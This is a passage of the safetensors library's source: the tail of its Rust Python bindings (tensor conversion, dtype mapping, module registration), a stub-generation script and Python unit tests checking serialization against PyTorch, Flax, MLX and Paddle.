"sys"))?; let byteorder: String = sys.getattr(intern!(py, "byteorder"))?.extract()?; if byteorder == "big" { let inplace_kwargs = [(intern!(py, "inplace"), PyBool::new(py, false))].into_py_dict(py)?; tensor = tensor .getattr("byteswap")? .call((), Some(&inplace_kwargs))?; } tensor }; let mut tensor: PyBound<'_, PyAny> = tensor.call_method1("reshape", (shape,))?; let tensor = match framework { Framework::Flax => { let module = Python::with_gil(|py| -> PyResult<&Py> { let module = PyModule::import(py, intern!(py, "jax"))?; Ok(FLAX_MODULE.get_or_init(py, || module.into())) })? .bind(py); module .getattr(intern!(py, "numpy"))? .getattr(intern!(py, "array"))? .call1((tensor,))? } Framework::Tensorflow => { let module = Python::with_gil(|py| -> PyResult<&Py> { let module = PyModule::import(py, intern!(py, "tensorflow"))?; Ok(TENSORFLOW_MODULE.get_or_init(py, || module.into())) })? .bind(py); module .getattr(intern!(py, "convert_to_tensor"))? .call1((tensor,))? } Framework::Mlx => { let module = Python::with_gil(|py| -> PyResult<&Py> { let module = PyModule::import(py, intern!(py, "mlx"))?; Ok(MLX_MODULE.get_or_init(py, || module.into())) })? .bind(py); module .getattr(intern!(py, "core"))? // .getattr(intern!(py, "array"))? .call_method1("array", (tensor,))? 
} Framework::Pytorch => { if device != &Device::Cpu { let device: PyObject = device.clone().into_pyobject(py)?.into(); let kwargs = PyDict::new(py); tensor = tensor.call_method("to", (device,), Some(&kwargs))?; } tensor } Framework::Numpy => tensor, }; // let tensor = tensor.into_py_bound(py); Ok(tensor.into()) }) } fn get_pydtype(module: &PyBound<'_, PyModule>, dtype: Dtype, is_numpy: bool) -> PyResult { Python::with_gil(|py| { let dtype: PyObject = match dtype { Dtype::F64 => module.getattr(intern!(py, "float64"))?.into(), Dtype::F32 => module.getattr(intern!(py, "float32"))?.into(), Dtype::BF16 => { if is_numpy { module .getattr(intern!(py, "dtype"))? .call1(("bfloat16",))? .into() } else { module.getattr(intern!(py, "bfloat16"))?.into() } } Dtype::F16 => module.getattr(intern!(py, "float16"))?.into(), Dtype::U64 => module.getattr(intern!(py, "uint64"))?.into(), Dtype::I64 => module.getattr(intern!(py, "int64"))?.into(), Dtype::U32 => module.getattr(intern!(py, "uint32"))?.into(), Dtype::I32 => module.getattr(intern!(py, "int32"))?.into(), Dtype::U16 => module.getattr(intern!(py, "uint16"))?.into(), Dtype::I16 => module.getattr(intern!(py, "int16"))?.into(), Dtype::U8 => module.getattr(intern!(py, "uint8"))?.into(), Dtype::I8 => module.getattr(intern!(py, "int8"))?.into(), Dtype::BOOL => { if is_numpy { py.import("builtins")?.getattr(intern!(py, "bool"))?.into() } else { module.getattr(intern!(py, "bool"))?.into() } } Dtype::F8_E4M3 => module.getattr(intern!(py, "float8_e4m3fn"))?.into(), Dtype::F8_E5M2 => module.getattr(intern!(py, "float8_e5m2"))?.into(), dtype => { return Err(SafetensorError::new_err(format!( "Dtype not understood: {dtype:?}" ))) } }; Ok(dtype) }) } pyo3::create_exception!( safetensors_rust, SafetensorError, PyException, "Custom Python Exception for Safetensor errors." ); /// A Python module implemented in Rust. 
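// Built by maturin as `safetensors._safetensors_rust` (see `module-name` in
// bindings/python/pyproject.toml); the Python package re-exports these symbols, e.g.
// `from safetensors import serialize, deserialize, safe_open`.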
#[pymodule] fn _safetensors_rust(m: &PyBound<'_, PyModule>) -> PyResult<()> { m.add_function(wrap_pyfunction!(serialize, m)?)?; m.add_function(wrap_pyfunction!(serialize_file, m)?)?; m.add_function(wrap_pyfunction!(deserialize, m)?)?; m.add_class::()?; m.add("SafetensorError", m.py().get_type::())?; m.add("__version__", env!("CARGO_PKG_VERSION"))?; Ok(()) } #[cfg(test)] mod tests { use super::*; #[test] fn version_parse() { let torch_version = "1.1.1"; let version = Version::from_string(torch_version).unwrap(); assert_eq!(version, Version::new(1, 1, 1)); let torch_version = "2.0.0a0+gitd1123c9"; let version = Version::from_string(torch_version).unwrap(); assert_eq!(version, Version::new(2, 0, 0)); let torch_version = "something"; let version = Version::from_string(torch_version); assert!(version.is_err()); } } safetensors-0.5.2/bindings/python/stub.py000066400000000000000000000127541473753372300205460ustar00rootroot00000000000000import argparse import inspect import os import black INDENT = " " * 4 GENERATED_COMMENT = "# Generated content DO NOT EDIT\n" def do_indent(text: str, indent: str): return text.replace("\n", f"\n{indent}") def function(obj, indent, text_signature=None): if text_signature is None: text_signature = obj.__text_signature__ string = "" string += f"{indent}def {obj.__name__}{text_signature}:\n" indent += INDENT string += f'{indent}"""\n' string += f"{indent}{do_indent(obj.__doc__, indent)}\n" string += f'{indent}"""\n' string += f"{indent}pass\n" string += "\n" string += "\n" return string def member_sort(member): if inspect.isclass(member): value = 10 + len(inspect.getmro(member)) else: value = 1 return value def fn_predicate(obj): value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj) if value: return ( obj.__doc__ and obj.__text_signature__ and (not obj.__name__.startswith("_") or obj.__name__ in {"__enter__", "__exit__"}) ) if inspect.isgetsetdescriptor(obj): return obj.__doc__ and not obj.__name__.startswith("_") return False def get_module_members(module): members = [ member for name, member in inspect.getmembers(module) if not name.startswith("_") and not inspect.ismodule(member) ] members.sort(key=member_sort) return members def pyi_file(obj, indent=""): string = "" if inspect.ismodule(obj): string += GENERATED_COMMENT members = get_module_members(obj) for member in members: string += pyi_file(member, indent) elif inspect.isclass(obj): indent += INDENT mro = inspect.getmro(obj) if len(mro) > 2: inherit = f"({mro[1].__name__})" else: inherit = "" string += f"class {obj.__name__}{inherit}:\n" body = "" if obj.__doc__: body += f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n' fns = inspect.getmembers(obj, fn_predicate) # Init if obj.__text_signature__: signature = obj.__text_signature__.replace("(", "(self, ") body += f"{indent}def __init__{signature}:\n" body += f"{indent+INDENT}pass\n" body += "\n" for name, fn in fns: body += pyi_file(fn, indent=indent) if not body: body += f"{indent}pass\n" string += body string += "\n\n" elif inspect.isbuiltin(obj): string += f"{indent}@staticmethod\n" string += function(obj, indent) elif inspect.ismethoddescriptor(obj): string += function(obj, indent) elif inspect.isgetsetdescriptor(obj): # TODO it would be interesing to add the setter maybe ? 
string += f"{indent}@property\n" string += function(obj, indent, text_signature="(self)") else: raise Exception(f"Object {obj} is not supported") return string def py_file(module, origin): members = get_module_members(module) string = GENERATED_COMMENT string += f"from .. import {origin}\n" string += "\n" for member in members: name = member.__name__ string += f"{name} = {origin}.{name}\n" return string def do_black(content, is_pyi): mode = black.Mode( target_versions={black.TargetVersion.PY35}, line_length=119, is_pyi=is_pyi, string_normalization=True, experimental_string_processing=False, ) try: content = content.replace("$self", "self") return black.format_file_contents(content, fast=True, mode=mode) except black.NothingChanged: return content def write(module, directory, origin, check=False): submodules = [(name, member) for name, member in inspect.getmembers(module) if inspect.ismodule(member)] filename = os.path.join(directory, "__init__.pyi") pyi_content = pyi_file(module) pyi_content = do_black(pyi_content, is_pyi=True) os.makedirs(directory, exist_ok=True) if check: with open(filename, "r") as f: data = f.read() assert data == pyi_content, f"The content of {filename} seems outdated, please run `python stub.py`" else: with open(filename, "w") as f: f.write(pyi_content) filename = os.path.join(directory, "__init__.py") py_content = py_file(module, origin) py_content = do_black(py_content, is_pyi=False) os.makedirs(directory, exist_ok=True) is_auto = False if not os.path.exists(filename): is_auto = True else: with open(filename, "r") as f: line = f.readline() if line == GENERATED_COMMENT: is_auto = True if is_auto: if check: with open(filename, "r") as f: data = f.read() assert data == py_content, f"The content of {filename} seems outdated, please run `python stub.py`" else: with open(filename, "w") as f: f.write(py_content) for name, submodule in submodules: write(submodule, os.path.join(directory, name), f"{name}", check=check) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--check", action="store_true") args = parser.parse_args() import safetensors write( safetensors._safetensors_rust, "py_src/safetensors/", "safetensors", check=args.check, ) safetensors-0.5.2/bindings/python/tests/000077500000000000000000000000001473753372300203505ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/tests/data/000077500000000000000000000000001473753372300212615ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/tests/data/__init__.py000066400000000000000000000000001473753372300233600ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/tests/test_flax_comparison.py000066400000000000000000000044621473753372300251530ustar00rootroot00000000000000import platform import unittest if platform.system() != "Windows": # This platform is not supported, we don't want to crash on import # This test will be skipped anyway. 
import jax.numpy as jnp from jax import random from flax.serialization import msgpack_restore, msgpack_serialize from safetensors import safe_open from safetensors.flax import load_file, save_file # Jax doesn't not exist on Windows @unittest.skipIf(platform.system() == "Windows", "Flax is not available on Windows") class LoadTestCase(unittest.TestCase): def setUp(self): key = random.key(0) data = { "test": random.normal(key, (1024, 1024), dtype=jnp.float32), "test2": random.normal(key, (1024, 1024), dtype=jnp.float16), "test3": random.normal(key, (1024, 1024), dtype=jnp.bfloat16), } self.flax_filename = "./tests/data/flax_load.msgpack" self.sf_filename = "./tests/data/flax_load.safetensors" serialized = msgpack_serialize(data) with open(self.flax_filename, "wb") as f: f.write(serialized) save_file(data, self.sf_filename) def test_zero_sized(self): data = { "test": jnp.zeros((2, 0), dtype=jnp.float32), } local = "./tests/data/out_safe_flat_mmap_small2.safetensors" save_file(data.copy(), local) reloaded = load_file(local) # Empty tensor != empty tensor on numpy, so comparing shapes # instead self.assertEqual(data["test"].shape, reloaded["test"].shape) def test_deserialization_safe(self): weights = load_file(self.sf_filename) with open(self.flax_filename, "rb") as f: data = f.read() flax_weights = msgpack_restore(data) for k, v in weights.items(): tv = flax_weights[k] self.assertTrue(jnp.allclose(v, tv)) def test_deserialization_safe_open(self): weights = {} with safe_open(self.sf_filename, framework="flax") as f: for k in f.keys(): weights[k] = f.get_tensor(k) with open(self.flax_filename, "rb") as f: data = f.read() flax_weights = msgpack_restore(data) for k, v in weights.items(): tv = flax_weights[k] self.assertTrue(jnp.allclose(v, tv)) safetensors-0.5.2/bindings/python/tests/test_mlx_comparison.py000066400000000000000000000044621473753372300250210ustar00rootroot00000000000000import platform import unittest HAS_MLX = False if platform.system() == "Darwin": # This platform is not supported, we don't want to crash on import # This test will be skipped anyway. try: import mlx.core as mx HAS_MLX = True except ImportError: pass if HAS_MLX: from safetensors import safe_open from safetensors.mlx import load_file, save_file # MLX only exists on Mac @unittest.skipIf(platform.system() != "Darwin", "Mlx is not available on non Mac") @unittest.skipIf(not HAS_MLX, "Mlx is not available.") class LoadTestCase(unittest.TestCase): def setUp(self): data = { "test": mx.randn((1024, 1024), dtype=mx.float32), "test2": mx.randn((1024, 1024), dtype=mx.float32), "test3": mx.randn((1024, 1024), dtype=mx.float32), # This doesn't work because bfloat16 is not implemented # with similar workarounds as jax/tensorflow. 
# https://github.com/ml-explore/mlx/issues/1296 # "test4": mx.randn((1024, 1024), dtype=mx.bfloat16), } self.mlx_filename = "./tests/data/mlx_load.npz" self.sf_filename = "./tests/data/mlx_load.safetensors" mx.savez(self.mlx_filename, **data) save_file(data, self.sf_filename) def test_zero_sized(self): data = { "test": mx.zeros((2, 0), dtype=mx.float32), } local = "./tests/data/out_safe_flat_mmap_small2.safetensors" save_file(data.copy(), local) reloaded = load_file(local) # Empty tensor != empty tensor on numpy, so comparing shapes # instead self.assertEqual(data["test"].shape, reloaded["test"].shape) def test_deserialization_safe(self): weights = load_file(self.sf_filename) mlx_weights = mx.load(self.mlx_filename) for k, v in weights.items(): tv = mlx_weights[k] self.assertTrue(mx.allclose(v, tv)) def test_deserialization_safe_open(self): weights = {} with safe_open(self.sf_filename, framework="mlx") as f: for k in f.keys(): weights[k] = f.get_tensor(k) mlx_weights = mx.load(self.mlx_filename) for k, v in weights.items(): tv = mlx_weights[k] self.assertTrue(mx.allclose(v, tv)) safetensors-0.5.2/bindings/python/tests/test_paddle_comparison.py000066400000000000000000000027241473753372300254510ustar00rootroot00000000000000import unittest import numpy as np try: import paddle from safetensors.paddle import load_file, save_file HAS_PADDLE = True except ImportError: HAS_PADDLE = False @unittest.skipIf(not HAS_PADDLE, "Paddle is not available") class SafeTestCase(unittest.TestCase): def setUp(self): data = { "test": paddle.zeros((1024, 1024), dtype=paddle.float32), "test2": paddle.zeros((1024, 1024), dtype=paddle.float32), "test3": paddle.zeros((1024, 1024), dtype=paddle.float32), } self.paddle_filename = "./tests/data/paddle_load.pdparams" self.sf_filename = "./tests/data/paddle_load.safetensors" paddle.save(data, self.paddle_filename) save_file(data, self.sf_filename) @unittest.expectedFailure def test_zero_sized(self): # This fails because paddle wants initialized tensor before # sending to numpy data = { "test": paddle.zeros((2, 0), dtype=paddle.float32), } local = "./tests/data/out_safe_paddle_mmap_small2.safetensors" save_file(data, local) reloaded = load_file(local) self.assertTrue(paddle.equal(data["test"], reloaded["test"])) def test_deserialization_safe(self): weights = load_file(self.sf_filename) paddle_weights = paddle.load(self.paddle_filename) for k, v in weights.items(): tv = paddle_weights[k] self.assertTrue(np.allclose(v, tv)) safetensors-0.5.2/bindings/python/tests/test_pt_comparison.py000066400000000000000000000315731473753372300246470ustar00rootroot00000000000000import sys import unittest import torch from safetensors import safe_open from safetensors.torch import load, load_file, save, save_file try: import torch_npu # noqa npu_present = True except Exception: npu_present = False class TorchTestCase(unittest.TestCase): def test_serialization(self): data = torch.zeros((2, 2), dtype=torch.int32) out = save({"test": data}) self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) save_file({"test": data}, "serialization.safetensors") out = open("serialization.safetensors", "rb").read() self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) data[1, 1] = 1 out = save({"test": data}) self.assertEqual( out, 
b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00", ) save_file({"test": data}, "serialization.safetensors") out = open("serialization.safetensors", "rb").read() self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00", ) data = torch.ones((2, 2), dtype=torch.bfloat16) data[0, 0] = 2.25 out = save({"test": data}) self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"BF16","shape":[2,2],"data_offsets":[0,8]}} \x10@\x80?\x80?\x80?', ) def test_odd_dtype(self): data = { "test": torch.randn((2, 2), dtype=torch.bfloat16), "test2": torch.randn((2, 2), dtype=torch.float16), "test3": torch.zeros((2, 2), dtype=torch.bool), } # Modify bool to have both values. data["test3"][0, 0] = True local = "./tests/data/out_safe_pt_mmap_small.safetensors" save_file(data, local) reloaded = load_file(local) self.assertTrue(torch.equal(data["test"], reloaded["test"])) self.assertTrue(torch.equal(data["test2"], reloaded["test2"])) self.assertTrue(torch.equal(data["test3"], reloaded["test3"])) def test_odd_dtype_fp8(self): if torch.__version__ < "2.1": return # torch.float8 requires 2.1 data = { "test1": torch.tensor([-0.5], dtype=torch.float8_e4m3fn), "test2": torch.tensor([-0.5], dtype=torch.float8_e5m2), } local = "./tests/data/out_safe_pt_mmap_small.safetensors" save_file(data, local) reloaded = load_file(local) # note: PyTorch doesn't implement torch.equal for float8 so we just compare the single element self.assertEqual(reloaded["test1"].dtype, torch.float8_e4m3fn) self.assertEqual(reloaded["test1"].item(), -0.5) self.assertEqual(reloaded["test2"].dtype, torch.float8_e5m2) self.assertEqual(reloaded["test2"].item(), -0.5) def test_zero_sized(self): data = { "test": torch.zeros((2, 0), dtype=torch.float), } local = "./tests/data/out_safe_pt_mmap_small2.safetensors" save_file(data, local) reloaded = load_file(local) self.assertTrue(torch.equal(data["test"], reloaded["test"])) reloaded = load(open(local, "rb").read()) self.assertTrue(torch.equal(data["test"], reloaded["test"])) def test_multiple_zero_sized(self): data = { "test": torch.zeros((2, 0), dtype=torch.float), "test2": torch.zeros((2, 0), dtype=torch.float), } local = "./tests/data/out_safe_pt_mmap_small3.safetensors" save_file(data, local) reloaded = load_file(local) self.assertTrue(torch.equal(data["test"], reloaded["test"])) self.assertTrue(torch.equal(data["test2"], reloaded["test2"])) def test_disjoint_tensors_shared_storage(self): A = torch.zeros((10, 10)) data = { "test": A[1:], "test2": A[:1], } local = "./tests/data/out_safe_pt_mmap_small4.safetensors" save_file(data, local) def test_meta_tensor(self): A = torch.zeros((10, 10), device=torch.device("meta")) data = { "test": A, } local = "./tests/data/out_safe_pt_mmap_small5.safetensors" with self.assertRaises(RuntimeError) as ex: save_file(data, local) self.assertIn("Cannot copy out of meta tensor", str(ex.exception)) def test_in_memory(self): data = { "test": torch.zeros((2, 2), dtype=torch.float32), } binary = save(data) self.assertEqual( binary, # Spaces are for forcing the alignment. 
b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"F32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) reloaded = load(binary) self.assertTrue(torch.equal(data["test"], reloaded["test"])) @unittest.skipIf(not torch.cuda.is_available(), "Cuda is not available") def test_gpu(self): data = { "test": torch.arange(4).view((2, 2)).to("cuda:0"), } local = "./tests/data/out_safe_pt_mmap_small.safetensors" save_file(data, local) reloaded = load_file(local) self.assertTrue(torch.equal(torch.arange(4).view((2, 2)), reloaded["test"])) @unittest.skipIf(not npu_present, "Npu is not available") def test_npu(self): data = { "test1": torch.zeros((2, 2), dtype=torch.float32).to("npu:0"), "test2": torch.zeros((2, 2), dtype=torch.float16).to("npu:0"), } local = "./tests/data/out_safe_pt_mmap_small_npu.safetensors" save_file(data, local) reloaded = load_file(local, device="npu:0") for k, v in reloaded.items(): self.assertTrue(torch.allclose(data[k], reloaded[k])) @unittest.skipIf(not torch.cuda.is_available(), "Cuda is not available") def test_anonymous_accelerator(self): data = { "test1": torch.zeros((2, 2), dtype=torch.float32).to(device=0), "test2": torch.zeros((2, 2), dtype=torch.float16).to(device=0), } local = "./tests/data/out_safe_pt_mmap_small_anonymous.safetensors" save_file(data, local) reloaded = load_file(local, device=0) for k, v in reloaded.items(): self.assertTrue(torch.allclose(data[k], reloaded[k])) def test_sparse(self): data = {"test": torch.sparse_coo_tensor(size=(2, 3))} local = "./tests/data/out_safe_pt_sparse.safetensors" with self.assertRaises(ValueError) as ctx: save_file(data, local) self.assertEqual( str(ctx.exception), "You are trying to save a sparse tensors: `['test']` which this library does not support. 
You can make it" " a dense tensor before saving with `.to_dense()` but be aware this might make a much larger file than" " needed.", ) def test_bogus(self): data = {"test": {"some": "thing"}} local = "./tests/data/out_safe_pt_sparse.safetensors" with self.assertRaises(ValueError) as ctx: save_file(data, local) self.assertEqual( str(ctx.exception), "Key `test` is invalid, expected torch.Tensor but received ", ) with self.assertRaises(ValueError) as ctx: save_file("notadict", local) self.assertEqual( str(ctx.exception), "Expected a dict of [str, torch.Tensor] but received ", ) class LoadTestCase(unittest.TestCase): def setUp(self): data = { "test": torch.zeros((1024, 1024), dtype=torch.float32), "test2": torch.zeros((1024, 1024), dtype=torch.float32), "test3": torch.zeros((1024, 1024), dtype=torch.float32), } self.pt_filename = "./tests/data/pt_load.pt" self.sf_filename = "./tests/data/pt_load.safetensors" with open(self.pt_filename, "wb") as f: torch.save(data, f) save_file(data, self.sf_filename) def test_deserialization_safe(self): tweights = torch.load(self.pt_filename) weights = load_file(self.sf_filename) for k, v in weights.items(): tv = tweights[k] self.assertTrue(torch.allclose(v, tv)) self.assertEqual(v.device, torch.device("cpu")) @unittest.skipIf(not torch.cuda.is_available(), "Cuda is not available") def test_deserialization_safe_gpu(self): # First time to hit disk tweights = torch.load(self.pt_filename, map_location="cuda:0") load_file(self.sf_filename, device=0) weights = load_file(self.sf_filename, device="cuda:0") for k, v in weights.items(): tv = tweights[k] self.assertTrue(torch.allclose(v, tv)) self.assertEqual(v.device, torch.device("cuda:0")) @unittest.skipIf(not torch.cuda.is_available(), "Cuda is not available") def test_deserialization_safe_gpu_slice(self): weights = {} with safe_open(self.sf_filename, framework="pt", device="cuda:0") as f: for k in f.keys(): weights[k] = f.get_slice(k)[:1] tweights = torch.load(self.pt_filename, map_location="cuda:0") tweights = {k: v[:1] for k, v in tweights.items()} for k, v in weights.items(): tv = tweights[k] self.assertTrue(torch.allclose(v, tv)) self.assertEqual(v.device, torch.device("cuda:0")) @unittest.skipIf(torch.cuda.device_count() < 2, "Only 1 device available") def test_deserialization_safe_device_1(self): load_file(self.sf_filename, device=1) weights = load_file(self.sf_filename, device="cuda:1") tweights = torch.load(self.pt_filename, map_location="cuda:1") for k, v in weights.items(): tv = tweights[k] self.assertTrue(torch.allclose(v, tv)) self.assertEqual(v.device, torch.device("cuda:1")) class SliceTestCase(unittest.TestCase): def setUp(self): self.tensor = torch.arange(6, dtype=torch.float32).reshape((1, 2, 3)) self.data = {"test": self.tensor} self.local = "./tests/data/out_safe_pt_mmap_slice.safetensors" # Need to copy since that call mutates the tensors to numpy save_file(self.data.copy(), self.local) def test_cannot_serialize_a_non_contiguous_tensor(self): tensor = torch.arange(6, dtype=torch.float32).reshape((1, 2, 3)) x = tensor[:, :, 1] data = {"test": x} self.assertFalse( x.is_contiguous(), ) with self.assertRaises(ValueError): save_file(data, "./tests/data/out.safetensors") def test_cannot_serialize_shared(self): A = torch.arange(6, dtype=torch.float32).reshape((2, 3)) B = A[:1] data = {"A": A, "B": B} with self.assertRaises(RuntimeError): save_file(data, "./tests/data/out.safetensors") B = A[1:] data = {"A": A, "B": B} with self.assertRaises(RuntimeError): save_file(data, "./tests/data/out.safetensors") 
def test_deserialization_slice(self): with safe_open(self.local, framework="pt") as f: _slice = f.get_slice("test") self.assertEqual(_slice.get_shape(), [1, 2, 3]) self.assertEqual(_slice.get_dtype(), "F32") tensor = _slice[:, :, 1:2] self.assertTrue(torch.equal(tensor, torch.Tensor([[[1.0], [4.0]]]))) self.assertTrue(torch.equal(tensor, self.tensor[:, :, 1:2])) buffer = tensor.numpy() if sys.byteorder == "big": buffer.byteswap(inplace=True) buffer = buffer.tobytes() self.assertEqual( buffer, b"\x00\x00\x80?\x00\x00\x80@", ) def test_deserialization_metadata(self): with safe_open(self.local, framework="pt") as f: metadata = f.metadata() self.assertEqual(metadata, None) # Save another one *with* metadata tensor = torch.arange(6, dtype=torch.float32).reshape((1, 2, 3)) data = {"test": tensor} local = "./tests/data/out_safe_pt_mmap2.safetensors" # Need to copy since that call mutates the tensors to numpy save_file(data, local, metadata={"Something": "more"}) with safe_open(local, framework="pt") as f: metadata = f.metadata() self.assertEqual(metadata, {"Something": "more"}) safetensors-0.5.2/bindings/python/tests/test_pt_model.py000066400000000000000000000237231473753372300235730ustar00rootroot00000000000000import copy import unittest import torch from safetensors import safe_open from safetensors.torch import ( _end_ptr, _find_shared_tensors, _is_complete, _remove_duplicate_names, load_model, save_file, save_model, ) class OnesModel(torch.nn.Module): def __init__(self): super().__init__() self.a = torch.nn.Linear(4, 4) self.a.weight = torch.nn.Parameter(torch.ones((4, 4))) self.a.bias = torch.nn.Parameter(torch.ones((4,))) self.b = self.a class Model(torch.nn.Module): def __init__(self): super().__init__() self.a = torch.nn.Linear(100, 100) self.b = self.a class NonContiguousModel(torch.nn.Module): def __init__(self): super().__init__() self.a = torch.nn.Linear(100, 100) A = torch.zeros((100, 100)) A = A.transpose(0, 1) self.a.weight = torch.nn.Parameter(A) class CopyModel(torch.nn.Module): def __init__(self): super().__init__() self.a = torch.nn.Linear(100, 100) self.b = copy.deepcopy(self.a) class NoSharedModel(torch.nn.Module): def __init__(self): super().__init__() self.a = torch.nn.Linear(100, 100) self.b = torch.nn.Linear(100, 100) class TorchModelTestCase(unittest.TestCase): def test_is_complete(self): A = torch.zeros((3, 3)) self.assertTrue(_is_complete(A)) B = A[:1, :] self.assertFalse(_is_complete(B)) # Covers the whole storage but with holes C = A[::2, :] self.assertFalse(_is_complete(C)) D = torch.zeros((2, 2), device=torch.device("meta")) self.assertTrue(_is_complete(D)) def test_find_shared_tensors(self): A = torch.zeros((3, 3)) B = A[:1, :] self.assertEqual(_find_shared_tensors({"A": A, "B": B}), [{"A", "B"}]) self.assertEqual(_find_shared_tensors({"A": A}), [{"A"}]) self.assertEqual(_find_shared_tensors({"B": B}), [{"B"}]) C = torch.zeros((2, 2), device=torch.device("meta")) D = C[:1] # Meta device is not shared self.assertEqual(_find_shared_tensors({"C": C, "D": D}), []) self.assertEqual(_find_shared_tensors({"C": C}), []) self.assertEqual(_find_shared_tensors({"D": D}), []) def test_find_shared_non_shared_tensors(self): A = torch.zeros((4,)) B = A[:2] C = A[2:] # Shared storage but do not overlap self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B"}, {"C"}]) B = A[:2] C = A[1:] # Shared storage but *do* overlap self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B", "C"}]) B = A[:2] C = A[2:] D = A[:1] # Shared storage but *do* overlap 
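        # Only B and D overlap here; C maps to a disjoint region of the same storage, so it ends up in its own group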
self.assertEqual(_find_shared_tensors({"B": B, "C": C, "D": D}), [{"B", "D"}, {"C"}]) def test_end_ptr(self): A = torch.zeros((4,)) start = A.data_ptr() end = _end_ptr(A) self.assertEqual(end - start, 16) B = torch.zeros((16,)) A = B[::4] start = A.data_ptr() end = _end_ptr(A) # Jump 3 times 16 byes (the stride of B) # Then add the size of the datapoint 4 bytes self.assertEqual(end - start, 16 * 3 + 4) # FLOAT16 A = torch.zeros((4,), dtype=torch.float16) start = A.data_ptr() end = _end_ptr(A) self.assertEqual(end - start, 8) B = torch.zeros((16,), dtype=torch.float16) A = B[::4] start = A.data_ptr() end = _end_ptr(A) # Jump 3 times 8 bytes (the stride of B) # Then add the size of the datapoint 4 bytes self.assertEqual(end - start, 8 * 3 + 2) def test_remove_duplicate_names(self): A = torch.zeros((3, 3)) B = A[:1, :] self.assertEqual(_remove_duplicate_names({"A": A, "B": B}), {"A": ["B"]}) self.assertEqual(_remove_duplicate_names({"A": A, "B": B, "C": A}), {"A": ["B", "C"]}) with self.assertRaises(RuntimeError): self.assertEqual(_remove_duplicate_names({"B": B}), []) def test_failure(self): model = Model() with self.assertRaises(RuntimeError): save_file(model.state_dict(), "tmp.safetensors") # def test_workaround_refuse(self): # model = Model() # A = torch.zeros((1000, 10)) # a = A[:100, :] # model.a.weight = torch.nn.Parameter(a) # with self.assertRaises(RuntimeError) as ctx: # save_model(model, "tmp4.safetensors") # self.assertIn(".Refusing to save/load the model since you could be storing much more memory than needed.", str(ctx.exception)) def test_save(self): # Just testing the actual saved file to make sure we're ok on big endian model = OnesModel() save_model(model, "tmp_ones.safetensors") with safe_open("tmp_ones.safetensors", framework="pt") as f: self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"}) # 192 hardcoded to skip the header, metadata order is random. 
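        # (8 bytes of little-endian header length + a 184-byte JSON header = 192, where the raw tensor data begins)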
self.assertEqual( open("tmp_ones.safetensors", "rb").read()[192:], b"""\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?""", ) model2 = OnesModel() load_model(model2, "tmp_ones.safetensors") state_dict = model.state_dict() for k, v in model2.state_dict().items(): torch.testing.assert_close(v, state_dict[k]) def test_workaround(self): model = Model() save_model(model, "tmp.safetensors") with safe_open("tmp.safetensors", framework="pt") as f: self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"}) model2 = Model() load_model(model2, "tmp.safetensors") state_dict = model.state_dict() for k, v in model2.state_dict().items(): torch.testing.assert_close(v, state_dict[k]) def test_workaround_works_with_different_on_file_names(self): model = Model() state_dict = model.state_dict() state_dict.pop("a.weight") state_dict.pop("a.bias") save_file(state_dict, "tmp.safetensors") model2 = Model() load_model(model2, "tmp.safetensors") state_dict = model.state_dict() for k, v in model2.state_dict().items(): torch.testing.assert_close(v, state_dict[k]) def test_workaround_non_contiguous(self): model = NonContiguousModel() with self.assertRaises(ValueError) as ctx: save_model(model, "tmp_c.safetensors", force_contiguous=False) self.assertIn("use save_model(..., force_contiguous=True)", str(ctx.exception)) save_model(model, "tmp_c.safetensors", force_contiguous=True) model2 = NonContiguousModel() load_model(model2, "tmp_c.safetensors") state_dict = model.state_dict() for k, v in model2.state_dict().items(): torch.testing.assert_close(v, state_dict[k]) def test_workaround_copy(self): model = CopyModel() self.assertEqual( _find_shared_tensors(model.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}] ) save_model(model, "tmp.safetensors") model2 = CopyModel() load_model(model2, "tmp.safetensors") state_dict = model.state_dict() for k, v in model2.state_dict().items(): torch.testing.assert_close(v, state_dict[k]) def test_difference_with_torch(self): model = Model() torch.save(model.state_dict(), "tmp2.bin") model2 = NoSharedModel() # This passes on torch. # The tensors are shared on disk, they are *not* shared within the model # The model happily loads the tensors, and ends up *not* sharing the tensors by. 
